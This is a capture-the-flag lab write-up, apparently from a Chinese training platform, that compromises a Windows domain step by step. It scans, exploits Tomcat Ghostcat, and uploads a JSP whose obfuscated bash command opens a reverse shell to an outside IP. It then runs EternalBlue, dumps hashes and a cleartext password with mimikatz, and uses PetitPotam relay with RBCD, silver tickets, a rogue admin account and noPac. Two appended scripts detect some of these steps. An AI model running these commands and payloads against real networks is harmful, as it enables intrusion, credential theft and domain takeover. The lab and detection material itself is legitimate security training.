春秋云镜-Spoofing

flag01

Start with a quick fscan sweep of the target:

fscan -h 39.99.139.193

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
39.99.139.193:8080 open
39.99.139.193:22 open
39.99.139.193:8009 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.99.139.193:8080 code:200 len:7091 title:后台管理

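Port 8080 presents itself as an admin backend (title 后台管理), but there is nothing behind it. Port 8009 is open as well, and seeing it immediately suggested Tomcat.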

python dirsearch.py -u http://39.99.139.193/ -e *
D:\Program Files\dirsearch-master\dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25
Wordlist size: 15000

Output: D:\Program Files\dirsearch-master\reports\http_39.99.139.193\__25-03-05_20-52-45.txt

Target: http://39.99.139.193/

[20:52:45] Starting:

Cannot connect to: 39.99.139.193

Task Completed

D:\Program Files\dirsearch-master>python dirsearch.py -u http://39.99.139.193:8080/ -e *
D:\Program Files\dirsearch-master\dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25
Wordlist size: 15000

Output: D:\Program Files\dirsearch-master\reports\http_39.99.139.193_8080\__25-03-05_20-53-00.txt

Target: http://39.99.139.193:8080/

[20:53:00] Starting:
[20:53:01] 302 - 0B - /js -> /js/
[20:53:06] 200 - 114B - /404.html
[20:53:07] 400 - 795B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[20:53:07] 400 - 795B - /a%5c.aspx
[20:53:25] 200 - 7KB - /console.html
[20:53:26] 302 - 0B - /css -> /css/
[20:53:27] 302 - 0B - /data -> /data/
[20:53:28] 302 - 0B - /docs -> /docs/
[20:53:28] 404 - 750B - /docs/html/developer/ch02.html
[20:53:28] 404 - 731B - /docs/changelog.txt
[20:53:28] 404 - 749B - /docs/html/admin/ch03s07.html
[20:53:28] 404 - 749B - /docs/html/admin/ch01s04.html
[20:53:28] 404 - 747B - /docs/html/admin/index.html
[20:53:28] 404 - 733B - /docs/export-demo.xml
[20:53:28] 404 - 737B - /docs/html/index.html
[20:53:28] 404 - 753B - /docs/html/developer/ch03s15.html
[20:53:28] 404 - 732B - /docs/CHANGELOG.html
[20:53:28] 404 - 746B - /docs/html/admin/ch01.html
[20:53:28] 404 - 729B - /docs/_build/
[20:53:28] 404 - 730B - /docs/updating.txt
[20:53:28] 404 - 733B - /docs/maintenance.txt
[20:53:28] 404 - 730B - /docs/swagger.json
[20:53:28] 200 - 17KB - /docs/
[20:53:28] 302 - 0B - /download -> /download/
[20:53:28] 200 - 132B - /download/
[20:53:30] 404 - 781B - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[20:53:30] 404 - 746B - /examples/servlet/SnoopServlet
[20:53:30] 200 - 1KB - /examples/websocket/index.xhtml
[20:53:30] 302 - 0B - /examples -> /examples/
[20:53:30] 200 - 1010B - /examples/servlets/servlet/RequestHeaderExample
[20:53:30] 200 - 14KB - /examples/jsp/index.html
[20:53:30] 200 - 1KB - /examples/
[20:53:30] 200 - 689B - /examples/jsp/snp/snoop.jsp
[20:53:30] 200 - 6KB - /examples/servlets/index.html
[20:53:30] 200 - 658B - /examples/servlets/servlet/CookieExample
[20:53:34] 403 - 3KB - /host-manager/html
[20:53:34] 403 - 3KB - /host-manager/
[20:53:34] 302 - 0B - /images -> /images/
[20:53:37] 302 - 0B - /lib -> /lib/
[20:53:40] 302 - 0B - /manager -> /manager/
[20:53:40] 403 - 3KB - /manager/status/all
[20:53:40] 403 - 3KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage
[20:53:40] 403 - 3KB - /manager/admin.asp
[20:53:40] 403 - 3KB - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY
[20:53:40] 403 - 3KB - /manager/html/
[20:53:40] 403 - 3KB - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS
[20:53:40] 403 - 3KB - /manager/login
[20:53:40] 403 - 3KB - /manager/
[20:53:40] 403 - 3KB - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
[20:53:40] 403 - 3KB - /manager/jmxproxy/?qry=STUFF
[20:53:40] 403 - 3KB - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE
[20:53:40] 403 - 3KB - /manager/jmxproxy
[20:53:40] 403 - 3KB - /manager/login.asp
[20:53:40] 403 - 3KB - /manager/html
[20:53:40] 403 - 3KB - /manager/VERSION
[20:54:00] 403 - 0B - /upload
[20:54:00] 403 - 0B - /upload/2.php
[20:54:00] 403 - 0B - /upload/b_user.xls
[20:54:00] 403 - 0B - /upload/1.php
[20:54:00] 403 - 0B - /upload/b_user.csv
[20:54:00] 403 - 0B - /upload/
[20:54:00] 403 - 0B - /upload/loginIxje.php
[20:54:00] 403 - 0B - /upload/test.php
[20:54:00] 403 - 0B - /upload/test.txt
[20:54:00] 403 - 0B - /upload/upload.php
[20:54:00] 200 - 9KB - /user.html

It is indeed Tomcat.

This version of Tomcat is affected by CVE-2020-1938, which allows arbitrary file read and file inclusion.

 python3 ajpShooter.py http://39.99.139.193:8080 8009  /WEB-INF/web.xml read

_ _ __ _ _
/_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __
//_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
/ _ \| | |_) | _\ \ | | | (_) | (_) | || __/ |
\_/ \_// | .__/ \__/_| |_|\___/ \___/ \__\___|_|
|__/|_|
00theway,just for test


[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"2489-1670857638305"
[<] Last-Modified: Mon, 12 Dec 2022 15:07:18 GMT
[<] Content-Type: application/xml
[<] Content-Length: 2489

<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
<display-name>Archetype Created Web Application</display-name>

<security-constraint>
<display-name>Tomcat Server Configuration Security Constraint</display-name>
<web-resource-collection>
<web-resource-name>Protected Area</web-resource-name>
<url-pattern>/upload/*</url-pattern>
</web-resource-collection>
<auth-constraint>
<role-name>admin</role-name>
</auth-constraint>
</security-constraint>

<error-page>
<error-code>404</error-code>
<location>/404.html</location>
</error-page>

<error-page>
<error-code>403</error-code>
<location>/error.html</location>
</error-page>

<error-page>
<exception-type>java.lang.Throwable</exception-type>
<location>/error.html</location>
</error-page>

<servlet>
<servlet-name>HelloServlet</servlet-name>
<servlet-class>com.example.HelloServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>HelloServlet</servlet-name>
<url-pattern>/HelloServlet</url-pattern>
</servlet-mapping>

<servlet>
<display-name>LoginServlet</display-name>
<servlet-name>LoginServlet</servlet-name>
<servlet-class>com.example.LoginServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>LoginServlet</servlet-name>
<url-pattern>/LoginServlet</url-pattern>
</servlet-mapping>

<servlet>
<display-name>RegisterServlet</display-name>
<servlet-name>RegisterServlet</servlet-name>
<servlet-class>com.example.RegisterServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>RegisterServlet</servlet-name>
<url-pattern>/RegisterServlet</url-pattern>
</servlet-mapping>

<servlet>
<display-name>UploadTestServlet</display-name>
<servlet-name>UploadTestServlet</servlet-name>
<servlet-class>com.example.UploadTestServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>UploadTestServlet</servlet-name>
<url-pattern>/UploadServlet</url-pattern>
</servlet-mapping>

<servlet>
<display-name>DownloadFileServlet</display-name>
<servlet-name>DownloadFileServlet</servlet-name>
<servlet-class>com.example.DownloadFileServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadFileServlet</servlet-name>
<url-pattern>/DownloadServlet</url-pattern>
</servlet-mapping>
</web-app>

The web.xml reveals an UploadServlet. If it allows arbitrary file upload, combining that with the file inclusion gives RCE.

<%
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTYuMjM4LjIzMy41NS8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
%>

After the upload, the server returns the exact path of the stored file.

python3 ajpShooter.py http://39.99.139.193:8080 8009 /upload/4e1503eabe787f7ecf92dcadfe190f49/20250305085946656.txt eval

flag01: flag{cf4cd202-1c88-4fc7-8126-1acfcd04781f}

flag02

Scan the internal network with fscan:

172.22.11.76:8080 open
172.22.11.45:445 open
172.22.11.26:445 open
172.22.11.6:445 open
172.22.11.26:139 open
172.22.11.45:139 open
172.22.11.6:139 open
172.22.11.26:135 open
172.22.11.45:135 open
172.22.11.6:135 open
172.22.11.76:22 open
172.22.11.6:88 open
172.22.11.76:8009 open
[*] NetBios: 172.22.11.6 [+]DC XIAORANG\XIAORANG-DC
[*] NetInfo:
[*]172.22.11.26
[->]XR-LCM3AE8B
[->]172.22.11.26
[*] NetInfo:
[*]172.22.11.6
[->]XIAORANG-DC
[->]172.22.11.6
[*] NetBios: 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[+] 172.22.11.45 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.11.26 XIAORANG\XR-LCM3AE8B
[*] WebTitle: http://172.22.11.76:8080 code:200 len:7091 title:后台管理

The targets found:

172.22.11.6 DC

172.22.11.26 XIAORANG\XR-LCM3AE8B

172.22.11.76 Internet-facing host

172.22.11.45 Windows Server 2008 R2 (MS17-010)

172.22.11.45 is vulnerable to EternalBlue, so go after that one first:

proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.11.45
run

That gives the flag directly.

flag02: flag{cd715209-e4f4-4b84-b6f8-d0498b5256fd}

flag03

Dump the hashes:

load kiwi
creds_all

This yields the NTLM hashes of the machine account and of the user yangmei, plus yangmei's cleartext password.

meterpreter > load kiwi
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

Success.
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
meterpreter > creds_all
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username Domain NTLM SHA1
-------- ------ ---- ----
XR-DESKTOP$ XIAORANG d605f55adc8cf205980c365336efe895 5218e5dac784a294d070f182f137f5e5ab3115dc
yangmei XIAORANG 25e42ef4cc0ab6a8ff9e3edbbda91841 6b2838f81b57faed5d860adaf9401b0edb269a6f

wdigest credentials
===================

Username Domain Password
-------- ------ --------
(null) (null) (null)
XR-DESKTOP$ XIAORANG ae f2 db 0c 4c 73 d5 65 bf 23 da 1b 89 d3 76 7f eb ab 39 b1 a6 4e 2a 39 a5 c4 0c da 97 69 ed ad 1e 96 8e b8 fc 3b b6 f7 af e8 a2 06 ce b4 3
6 05 dc 51 12 ae 53 c5 6e 08 b2 c5 54 ad ab 52 41 1a c0 8a 91 46 8f 57 28 67 58 88 63 12 0a e7 25 95 bc 27 ce e0 3d 6d d6 5e 28 f4 c8 c5 75
da 14 fa 55 4f ac 47 47 cc 46 11 56 e8 b1 1e 41 1a 50 c8 10 f1 01 09 bd 78 98 53 b8 53 47 63 ed 82 10 d2 de 13 32 c2 e2 60 03 f4 f7 af ee
ed 28 ae 7b a2 e6 bf fe 0a 11 46 7a 92 ad 67 a6 e7 d8 9a 39 c3 ca ec 54 a7 d7 10 69 2e fd 34 0b 0c ca 97 2e a4 9e 9c 87 9d 7c 48 7d 81 f8 2
9 cc d4 1e a3 d6 4c 43 bd cb 4b c7 cd 75 1d f5 c1 0a 63 6a 18 ac 31 5c f6 a0 e4 4a 43 6d 9b 79 98 3d da 6a 43 a2 54 16 1c df d3 ea 5b 53 d5
6e 05 7a 67 fd 62 ae 02
yangmei XIAORANG xrihGHgoNZQ

kerberos credentials
====================

Username Domain Password
-------- ------ --------
(null) (null) (null)
xr-desktop$ XIAORANG.LAB ae f2 db 0c 4c 73 d5 65 bf 23 da 1b 89 d3 76 7f eb ab 39 b1 a6 4e 2a 39 a5 c4 0c da 97 69 ed ad 1e 96 8e b8 fc 3b b6 f7 af e8 a2 06 ce
b4 36 05 dc 51 12 ae 53 c5 6e 08 b2 c5 54 ad ab 52 41 1a c0 8a 91 46 8f 57 28 67 58 88 63 12 0a e7 25 95 bc 27 ce e0 3d 6d d6 5e 28 f4
c8 c5 75 da 14 fa 55 4f ac 47 47 cc 46 11 56 e8 b1 1e 41 1a 50 c8 10 f1 01 09 bd 78 98 53 b8 53 47 63 ed 82 10 d2 de 13 32 c2 e2 60 03
f4 f7 af ee ed 28 ae 7b a2 e6 bf fe 0a 11 46 7a 92 ad 67 a6 e7 d8 9a 39 c3 ca ec 54 a7 d7 10 69 2e fd 34 0b 0c ca 97 2e a4 9e 9c 87 9d
7c 48 7d 81 f8 29 cc d4 1e a3 d6 4c 43 bd cb 4b c7 cd 75 1d f5 c1 0a 63 6a 18 ac 31 5c f6 a0 e4 4a 43 6d 9b 79 98 3d da 6a 43 a2 54 16
1c df d3 ea 5b 53 d5 6e 05 7a 67 fd 62 ae 02
xr-desktop$ XIAORANG.LAB (null)
yangmei XIAORANG.LAB xrihGHgoNZQ

Scan to see which services are running:

proxychains crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M webdav 2>/dev/null

At first this threw an error as soon as I ran it; it only worked after switching to this module: CrackMapExec/cme/modules/petitpotam.py

proxychains -q crackmapexec smb 172.22.11.0/24 -u 'yangmei' -p 'xrihGHgoNZQ' -M petitpotam

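The plan now is the no-ADCS + PetitPotam + NTLM relay approach.

Use PetitPotam to coerce a vulnerable target that has the WebClient service running into connecting to our HTTP relay service. The target reaches the relay through WebClient and authenticates with NTLM; that authentication is relayed to LDAP, which gives us the identity of the machine account. Acting as the machine account, we modify its own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, configuring RBCD onto XR-LCM3AE8B.xiaorang.lab.

There is one condition, though: by default, WebClient only performs automatic NTLM authentication with the current user's credentials to targets in the Local Intranet or Trusted Sites lists.

So port 80 on the relay host (172.22.11.76) has to be forwarded to port 80 on our Kali machine.

First, on the Internet-facing target (the Tomcat host), run: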

socat tcp-listen:80,reuseaddr,fork tcp:vpsip:8848

On the VPS, run:

./frps -c ./tmp_frps.ini

tmp_frps.ini

[common]
bind_port = 7099

[tcp_1200]
type = tcp
local_ip = 127.0.0.1
local_port = 8848

On the local Kali machine, run:

./frpc -c ./tmp_frpc.ini

tmp_frpc.ini

[common]
server_addr = vpsip
server_port = 7099

[plugin_socks6]
type = tcp
remote_port = 8848
local_port = 80
local_ip = 127.0.0.1

The connection is received successfully.

Start the relay:

proxychains -q impacket-ntlmrelayx -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access

Next, use PetitPotam to coerce XR-LCM3AE8B into authenticating to 172.22.11.76. What the relay actually does here is modify the machine account's msDS-AllowedToActOnBehalfOfOtherIdentity attribute.

proxychains -q python3 PetitPotam.py -u yangmei -p xrihGHgoNZQ -d xiaorang.lab ubuntu@80/webdav 172.22.11.26

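Add the IP of XR-LCM3AE8B.xiaorang.lab to the hosts file.

Now a silver ticket can be requested (if the lab machines have been restarted, remember to dump the NTLM hash of the XR-LCM3AE8B machine again):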

proxychains impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :12dc53c0708954250b0123f9a2602f44 xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6

Running it produces the file administrator@cifs_XR-LCM3AE8B.xiaorang.lab@XIAORANG.LAB.ccache

Load the ticket:

export KRB5CCNAME=administrator@cifs_XR-LCM3AE8B.xiaorang.lab@XIAORANG.LAB.ccache

Now it is possible to connect without a password (psexec.py and the ccache file have to be in the same directory):

proxychains -q python3 psexec.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk

flag03: flag{2f44096c-18fe-413c-8cdb-c7be5da0a4f8}
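
The relay step in this section ends in one directory write: a machine account setting msDS-AllowedToActOnBehalfOfOtherIdentity on its own computer object. As an added detection example (not part of the original writeup), the Python below filters domain controller Security events with ID 5136 for that pattern; the event records are constructed, their keys follow the event's data field names, and `deploy-svc` and `FILESRV01` are hypothetical.

```python
RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"
VALUE_ADDED = "%%14674"   # raw OperationType code for "Value Added"

# Constructed sample of event 5136 (directory service object modified).
EVENTS = [
    {"EventID": 5136, "SubjectUserName": "XR-LCM3AE8B$",
     "ObjectDN": "CN=XR-LCM3AE8B,CN=Computers,DC=xiaorang,DC=lab",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "administrator",
     "ObjectDN": "CN=XR-DESKTOP,CN=Computers,DC=xiaorang,DC=lab",
     "AttributeLDAPDisplayName": "description",
     "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "deploy-svc",   # hypothetical account
     "ObjectDN": "CN=FILESRV01,CN=Computers,DC=xiaorang,DC=lab",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": VALUE_ADDED},
]

def object_cn(dn):
    """First RDN value of a DN: 'CN=HOST,CN=Computers,...' -> 'HOST'."""
    return dn.split(",", 1)[0].partition("=")[2]

def rbcd_writes(events):
    """Yield (severity, event) for every value added to the RBCD attribute.

    A computer account writing the attribute on its own object is what a
    relayed machine authentication produces, so it is ranked highest.
    """
    for ev in events:
        if ev.get("EventID") != 5136 or ev.get("OperationType") != VALUE_ADDED:
            continue
        if ev.get("AttributeLDAPDisplayName", "").lower() != RBCD_ATTR:
            continue
        subject = ev.get("SubjectUserName", "")
        self_write = (subject.endswith("$") and
                      subject[:-1].lower() == object_cn(ev["ObjectDN"]).lower())
        yield ("high" if self_write else "review"), ev

def summarize(events):
    return [(sev, ev["SubjectUserName"], object_cn(ev["ObjectDN"]))
            for sev, ev in rbcd_writes(events)]

if __name__ == "__main__":
    for row in summarize(EVENTS):
        print(*row)
```

Event 5136 is only written when directory service change auditing is enabled and the object carries a matching audit entry, so an empty result can also mean the auditing is missing.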

flag04

There is also an MA_Admin group:

net group /domain

net group "MA_Admin" /domain

It has a member, zhanghui.

Add an account and RDP in:

net user fffffilm Password@973 /add
net localgroup administrators fffffilm /add

Upload mimikatz and dump the hashes:

privilege::debug
sekurlsa::logonpasswords

This gives zhanghui's hash.

* Username : zhanghui
* Domain : XIAORANG
* NTLM : 1232126b24cdf8c9bd2f788a9d7c7ed1
* SHA1 : f3b66ff457185cdf5df6d0a085dd8935e226ba65
* DPAPI : 4bfe751ae03dc1517cfb688adc506154

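Because zhanghui is a member of the MA_Admin group, which can create objects under Computers and can therefore add machine accounts to the domain, noPac is possible. Tool: Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287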

proxychains -q python3 noPac.py xiaorang.lab/zhanghui -hashes ':1232126b24cdf8c9bd2f788a9d7c7ed1' -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell

flag04: flag{6f346099-4b13-4c55-bcb0-260addbd59ba}
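
CVE-2021-42278 relies on a machine account being renamed to a domain controller's name without the trailing `$`, which is visible in the DC Security log. As an added detection example (not part of the original writeup), the Python below correlates event 4741 (computer account created) with event 4781 (account name changed); the events, timestamps and the `WIN-CONSTRUCTED1$` name are constructed, and the ten-minute window is an assumption.

```python
from datetime import datetime, timedelta

DC_ACCOUNTS = {"XIAORANG-DC$"}      # DC machine account, from the scan above
WINDOW = timedelta(minutes=10)      # assumed correlation window

# Constructed sample of DC Security events.
EVENTS = [
    {"EventID": 4741, "Time": "2025-03-07T14:49:58",
     "SubjectUserName": "zhanghui", "TargetUserName": "WIN-CONSTRUCTED1$"},
    {"EventID": 4781, "Time": "2025-03-07T14:50:01",
     "SubjectUserName": "zhanghui",
     "OldTargetUserName": "WIN-CONSTRUCTED1$", "NewTargetUserName": "XIAORANG-DC"},
    {"EventID": 4781, "Time": "2025-03-07T15:10:00",
     "SubjectUserName": "helpdesk",
     "OldTargetUserName": "LAPTOP-07$", "NewTargetUserName": "LAPTOP-08$"},
]

def spoofed_renames(events, dc_accounts=DC_ACCOUNTS, window=WINDOW):
    """Return alerts for machine accounts renamed to a DC name minus its '$'."""
    dcs = {name.lower() for name in dc_accounts}
    created = {}                    # computer account -> (creator, time)
    alerts = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        when = datetime.fromisoformat(ev["Time"])
        if ev["EventID"] == 4741:
            created[ev["TargetUserName"].lower()] = (ev["SubjectUserName"], when)
        elif ev["EventID"] == 4781:
            old, new = ev["OldTargetUserName"], ev["NewTargetUserName"]
            if not old.endswith("$") or new.endswith("$"):
                continue            # an ordinary rename keeps the '$' suffix
            if new.lower() + "$" not in dcs:
                continue
            creator, made = created.get(old.lower(), (None, None))
            fresh = made is not None and when - made <= window
            alerts.append({"account": old, "spoofs": new + "$",
                           "renamed_by": ev["SubjectUserName"],
                           "created_by": creator if fresh else None})
    return alerts

if __name__ == "__main__":
    for alert in spoofed_renames(EVENTS):
        print(alert)
```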
